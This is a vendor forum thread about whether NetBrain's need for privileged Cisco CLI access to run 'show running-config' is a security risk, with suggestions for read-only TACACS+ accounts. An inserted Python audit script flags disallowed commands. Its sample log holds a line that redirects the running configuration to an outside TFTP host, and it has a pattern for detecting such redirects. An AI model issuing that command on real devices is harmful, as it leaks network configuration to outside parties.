Netbrain
04-17-2013, 05:18 AM
Pirx
Join Date: Apr 2013
Posts: 4
CLI security concerns

Our company has been trying out NetBrain 5 for some time and we like it so far. But we have some security concerns about NetBrain, especially about the way it accesses devices. To have full information it needs CLI access, which is considered a security violation.
Especially taking into account that on Cisco devices you can't just issue the "show running-configuration" command without read-write CLI access to the device.

Do you have some CLI configuration guidelines on how to secure CLI access or how to work around it without compromising security?

04-17-2013, 07:26 AM
Gerry (Administrator)
Join Date: May 2012
Posts: 69
Re: CLI security concerns

Quote (originally posted by Pirx):
> Our company has been trying out NetBrain 5 for some time and we like it so far. But we have some security concerns about NetBrain, especially about the way it accesses devices. To have full information it needs CLI access, which is considered a security violation.
> Especially taking into account that on Cisco devices you can't just issue the "show running-configuration" command without read-write CLI access to the device.
>
> Do you have some CLI configuration guidelines on how to secure CLI access or how to work around it without compromising security?

Hi,

Sorry, I'm not sure about your concerns, especially the words: “Especially taking into account that on Cisco devices you can't just issue "show running-configuration" command without read-write CLI access to the device”. Can you elaborate on it more? If you would like to prevent someone from issuing the show commands, you can impose a limitation by assigning different roles. I am not sure if I am on the right path. Hoping for more info.

04-18-2013, 08:14 AM
Pirx
Join Date: Apr 2013
Posts: 4
Re: CLI security concerns

Well, the concern is that an account which can issue "show running-config" can also do "conf ..." commands, doesn't it?
This made some of my colleagues point out that it could represent a security issue.
Possibly I am wrong.
That is why I am asking about some CLI access configuration guidelines.

04-19-2013, 02:32 AM
Gerry (Administrator)
Join Date: May 2012
Posts: 69
Re: CLI security concerns

Quote (originally posted by Pirx):
> Well, the concern is that an account which can issue "show running-config" can also do "conf ..." commands, doesn't it?
> This made some of my colleagues point out that it could represent a security issue.
> Possibly I am wrong.
> That is why I am asking about some CLI access configuration guidelines.

I got it. The accounts which are stored in NetBrain Shared Device Settings (Shared) are only for benchmark and various kinds of show command activities, and are not allowed to issue “config…” commands. Users are not allowed to issue config commands via NetBrain, and the only way is to log in to the physical devices, which requires the user to enter credentials manually (or to use Local device settings).
Or you can configure a read-only account which only allows show commands or specific show commands, and then I think your concerns will be terminated. If you choose the latter, I can email you a document which describes the show commands used by NetBrain.
Hope it helps.

04-19-2013, 02:34 AM
Pirx
Join Date: Apr 2013
Posts: 4
Re: CLI security concerns

To clarify:
On Cisco devices, in order to issue "show running-config" you need access level 15.
Level 15 access allows executing any command on the device, including configuration changes, hence the question.

Is "show running-config" absolutely necessary for NetBrain to collect full information?

Do you have any configuration templates for configuring CLI access to the devices taking into account security concerns?

04-19-2013, 04:49 AM
Gerry (Administrator)
Join Date: May 2012
Posts: 69
Re: CLI security concerns

Quote (originally posted by Pirx):
> To clarify:
> On Cisco devices, in order to issue "show running-config" you need access level 15.
> Level 15 access allows executing any command on the device, including configuration changes, hence the question.
>
> Is "show running-config" absolutely necessary for NetBrain to collect full information?
>
> Do you have any configuration templates for configuring CLI access to the devices taking into account security concerns?

Yes, show running-config is necessary for the full features of NetBrain. But NetBrain places a limitation on config commands to devices and only allows show commands. For the Change Management feature of OEv5.0, you can control this by assigning user roles from the Customer License server.

We have some customers who created special accounts in their TACACS+ server, for example accounts that only allow special show commands to be issued on devices, to meet their security requirements.

Sorry, we do not have this kind of document now :<.

Thanks
Gerry
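An added example, not part of the original thread and not NetBrain's code: one way to verify the "show commands only" restriction discussed above is to audit command-accounting records for the discovery account against a default-deny allowlist. The account name, record layout and allowlist are assumptions, and the sample records are constructed.

```python
import re

# Assumptions: "nbdiscovery" is a hypothetical read-only service account, and
# this allowlist is illustrative, not NetBrain's documented command list.
ACCOUNT = "nbdiscovery"
ALLOWED = [
    re.compile(r"show\s+\S.*"),
    re.compile(r"terminal\s+(length|width)\s+\d+"),
    re.compile(r"exit|logout"),
]
# Output modifiers that make a show command write to a file or URL.
WRITING_PIPE = re.compile(r"\|\s*(redirect|tee|append)\b")

# Constructed sample records (tab-separated, attribute=value pairs in the style
# of TACACS+ command accounting); not taken from the thread.
SAMPLE_LOG = (
    "2013-04-19 04:49:01\t192.0.2.10\tnbdiscovery\ttty2\tstop\tpriv-lvl=15\tcmd=terminal length 0 <cr>\n"
    "2013-04-19 04:49:02\t192.0.2.10\tnbdiscovery\ttty2\tstop\tpriv-lvl=15\tcmd=show running-config <cr>\n"
    "2013-04-19 04:49:05\t192.0.2.10\tnbdiscovery\ttty2\tstop\tpriv-lvl=15\tcmd=show ip route <cr>\n"
    "2013-04-19 04:50:11\t192.0.2.10\tnbdiscovery\ttty2\tstop\tpriv-lvl=15\tcmd=configure terminal <cr>\n"
    "2013-04-19 04:50:40\t192.0.2.10\tnbdiscovery\ttty2\tstop\tpriv-lvl=15\tcmd=show running-config | redirect tftp://198.51.100.9/cfg <cr>\n"
    "2013-04-19 04:51:00\t192.0.2.10\tadmin1\ttty3\tstop\tpriv-lvl=15\tcmd=configure terminal <cr>\n"
    "2013-04-19 04:52:00\tmalformed record\n"
)

def parse_record(line):
    """Return (user, command) for one record, or None if it carries no cmd."""
    fields = line.split("\t")
    for field in fields[3:]:
        if field.startswith("cmd="):
            cmd = field[4:].replace("<cr>", "").lower()
            return fields[2], " ".join(cmd.split())
    return None

def is_allowed(cmd):
    """Default deny: abbreviations such as 'conf t' do not match and are flagged."""
    if WRITING_PIPE.search(cmd):
        return False
    return any(p.fullmatch(cmd) for p in ALLOWED)

def audit(log_text, account=ACCOUNT):
    """List commands issued by `account` that fall outside the allowlist."""
    records = filter(None, map(parse_record, log_text.splitlines()))
    return [cmd for user, cmd in records if user == account and not is_allowed(cmd)]

if __name__ == "__main__":
    print(audit(SAMPLE_LOG))
```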

04-19-2013, 05:17 AM
Pirx
Join Date: Apr 2013
Posts: 4
Re: CLI security concerns

I see.
Thanks a lot for clarifying.
Could you please send me the document you mentioned before about the show commands NetBrain uses?

04-19-2013, 06:20 AM
Gerry (Administrator)
Join Date: May 2012
Posts: 69
Re: CLI security concerns

Quote (originally posted by Pirx):
> I see.
> Thanks a lot for clarifying.
> Could you please send me the document you mentioned before about the show commands NetBrain uses?

Hi,

I emailed you the document link. Please refer to it, thanks.